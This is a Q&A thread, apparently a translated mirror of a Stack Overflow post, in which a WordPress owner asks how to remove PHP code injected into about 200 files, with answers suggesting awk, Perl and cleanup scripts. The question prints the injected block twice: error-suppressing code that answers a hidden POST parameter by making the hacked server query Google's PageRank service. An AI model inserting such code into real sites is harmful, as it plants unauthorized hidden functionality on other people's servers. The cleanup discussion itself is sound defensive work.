合适的 grep + 是什么? sed语法?
我安装了两次 WordPress,其中黑客试图将一些 php 代码注入现有的 php 文件中,
没什么严重的,但现在我必须从多个子目录中的约 200 个文本文件中删除约 20 行文本,这不太好grep & 足够了sed 来弄清楚...
在文件夹“hacked wordpress”中搜索包含以下文本片段的所有 *.php 文件(包括子目录)然后删除该片段的命令语法是什么?< /强>
<?php
//{{56541616
GLOBAL $alreadyxxx;
if($alreadyxxx != 1)
{
$alreadyxxx = 1;
$olderrxxx=error_reporting(0);
function StrToNum($Str, $Check, $Magic)
{
$Int32Unit = 4294967296;
$length = strlen($Str);
for ($i = 0; $i < $length; $i++) {
$Check *= $Magic;
if ($Check >= $Int32Unit) {
$Check = ($Check - $Int32Unit * (int) ($Check / $Int32Unit));
$Check = ($Check < -2147483648) ? ($Check + $Int32Unit) : $Check;
}
$Check += ord($Str{$i});
}
return $Check;
}
function HashURL($String)
{
$Check1 = StrToNum($String, 0x1505, 0x21);
$Check2 = StrToNum($String, 0, 0x1003F);
$Check1 >>= 2;
$Check1 = (($Check1 >> 4) & 0x3FFFFC0 ) | ($Check1 & 0x3F);
$Check1 = (($Check1 >> 4) & 0x3FFC00 ) | ($Check1 & 0x3FF);
$Check1 = (($Check1 >> 4) & 0x3C000 ) | ($Check1 & 0x3FFF);
$T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) <<2 ) | ($Check2 & 0xF0F );
$T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000 );
return ($T1 | $T2);
}
function CheckHash($Hashnum)
{
$CheckByte = 0;
$Flag = 0;
$HashStr = sprintf('%u', $Hashnum) ;
$length = strlen($HashStr);
for ($i = $length-1; $i >= 0; $i--) {
$Re = $HashStr{$i};
if (1 === ($Flag % 2)) {
$Re += $Re;
$Re = (int)($Re / 10) + ($Re % 10);
}
$CheckByte += $Re;
$Flag ++;
}
$CheckByte %= 10;
if (0 !== $CheckByte) {
$CheckByte = 10 - $CheckByte;
if (1 === ($Flag % 2) ) {
if (1 === ($CheckByte % 2)) {
$CheckByte += 9;
}
$CheckByte >>= 1;
}
}
return '7'.$CheckByte.$HashStr;
}
function getpr($url)
{
$ch = CheckHash(HashURL($url));
$file = "http://toolbarqueries.google.com/search?client=navclient-auto&ch=$ch&features=Rank&q=info:$url";;
$data = file_get_contents($file);
$pos = strpos($data, "Rank_");
if($pos === false){return -1;} else{
$pr=substr($data, $pos + 9);
$pr=trim($pr);
$pr=str_replace("
",'',$pr);
return $pr;
}
}
if(isset($_POST['xxxprch']))
{
echo getpr($_POST['xxxprch']);
exit();
}
error_reporting($olderrxxx);
}
//}}18420732
?>
I had two wordpress installs where a hacker tried to inject some php code into the existing php files
Nothing serious, but now I have to remove about 20 lines of text from about 200 text files across a number of sub-directories, and just not good enough with grep & sed to figure it out...
What is the syntax of the command to search the folder "hacked wordpress" for all the *.php files (including subdirectories) that contain the following text snippet and then delete the snippet?
<?php
//{{56541616
GLOBAL $alreadyxxx;
if($alreadyxxx != 1)
{
$alreadyxxx = 1;
$olderrxxx=error_reporting(0);
function StrToNum($Str, $Check, $Magic)
{
$Int32Unit = 4294967296;
$length = strlen($Str);
for ($i = 0; $i < $length; $i++) {
$Check *= $Magic;
if ($Check >= $Int32Unit) {
$Check = ($Check - $Int32Unit * (int) ($Check / $Int32Unit));
$Check = ($Check < -2147483648) ? ($Check + $Int32Unit) : $Check;
}
$Check += ord($Str{$i});
}
return $Check;
}
function HashURL($String)
{
$Check1 = StrToNum($String, 0x1505, 0x21);
$Check2 = StrToNum($String, 0, 0x1003F);
$Check1 >>= 2;
$Check1 = (($Check1 >> 4) & 0x3FFFFC0 ) | ($Check1 & 0x3F);
$Check1 = (($Check1 >> 4) & 0x3FFC00 ) | ($Check1 & 0x3FF);
$Check1 = (($Check1 >> 4) & 0x3C000 ) | ($Check1 & 0x3FFF);
$T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) <<2 ) | ($Check2 & 0xF0F );
$T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000 );
return ($T1 | $T2);
}
function CheckHash($Hashnum)
{
$CheckByte = 0;
$Flag = 0;
$HashStr = sprintf('%u', $Hashnum) ;
$length = strlen($HashStr);
for ($i = $length-1; $i >= 0; $i--) {
$Re = $HashStr{$i};
if (1 === ($Flag % 2)) {
$Re += $Re;
$Re = (int)($Re / 10) + ($Re % 10);
}
$CheckByte += $Re;
$Flag ++;
}
$CheckByte %= 10;
if (0 !== $CheckByte) {
$CheckByte = 10 - $CheckByte;
if (1 === ($Flag % 2) ) {
if (1 === ($CheckByte % 2)) {
$CheckByte += 9;
}
$CheckByte >>= 1;
}
}
return '7'.$CheckByte.$HashStr;
}
function getpr($url)
{
$ch = CheckHash(HashURL($url));
$file = "http://toolbarqueries.google.com/search?client=navclient-auto&ch=$ch&features=Rank&q=info:$url";;
$data = file_get_contents($file);
$pos = strpos($data, "Rank_");
if($pos === false){return -1;} else{
$pr=substr($data, $pos + 9);
$pr=trim($pr);
$pr=str_replace("
",'',$pr);
return $pr;
}
}
if(isset($_POST['xxxprch']))
{
echo getpr($_POST['xxxprch']);
exit();
}
error_reporting($olderrxxx);
}
//}}18420732
?>
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论
评论(4)
我不会为此使用 sed 和 grep - 两者都只在行上操作并且不记得之前发生了什么。我一般用awk。大多数 awk 教程都是从基础知识开始的。基本上,您创建三个匹配块,一个与开头匹配,一个与结尾匹配,一个与其余部分匹配。在“开始”和“结束”中,您可以设置或重置布尔值来跟踪是否打印当前行。在处理其余行时,您可以根据此布尔值打印或不打印。
另外,请记住在运行之前备份文件。您不会是第一个因拼写错误而措手不及的人。
/startsequence/ { ignoring=true; } /endsequence/ { ignoring=false; } { if (!ignoring) print }将startsequence 和endsequence 替换为您自己的有效开始和结束序列。结束序列。如果这些数字实际上始终存在,请使用它们。我还没有检查过这个(因为我现在使用的是没有 cygwin 的 Windows 机器),但确实认为它有效。受到此处示例的启发
编辑:添加示例
I wouldn't use sed and grep for that - both operate on lines only and can't remember what came before. I usually use awk. It's the thing that most awk tutorials start with after the very basics. Basically, you create three match blocks, one that matches the opening, one that matches the closing and one that matches the rest. In the "opening" and "closing" you either set or reset a boolean to keep track of whether to print the current line. In the handling of the rest of the lines you either print or do not print depending on this boolean.
Also, do remember to back up your files before running it. You wouldn't be the first to get caught off-guard by a typo.
/startsequence/ { ignoring=true; } /endsequence/ { ignoring=false; } { if (!ignoring) print }Replace startsequence and endsequence by your own valid start & end sequence. If those numbers are actually consistently present, use those. I haven't checked this (as I'm on a cygwin-less Windows machine now) but do think it works. Inspired by the example here
edit: example added
我没有测试这个。但我希望这个想法是正确的:
i did not test this .but the idea is correct i hope:
我有同样的问题,仍在寻找解决方案。
看看这个:
http://crystaldawn.net/fix_hack
更多信息请参见:http://frazierit.com/blog/?p=103
也在这里:
如何使用调用 php 脚本html 表单元素而不是命令行?
清理脚本并不完美,似乎删除了一些不应该删除的内容。我没有能力去完善它。如果有人能修复它那就太棒了!
I have the same problem, and still looking for a fix.
Have a look at this:
http://crystaldawn.net/fix_hack
and more info here: http://frazierit.com/blog/?p=103
and here too:
How to call php script using html form elements instead of command line?
The clean up script is not perfect and seems to remove some stuff it shouldn't. I don't have the skills to refine it. It would be awesome if someone could fix it up!
使用 Perl;
这应该从每个 .php 文件中删除整个片段。
先试运行 - 所以在临时副本上进行测试。
use perl;
This should remove the whole snippet from each .php file.
DRY RUN FIRST - so test in on temporary copy.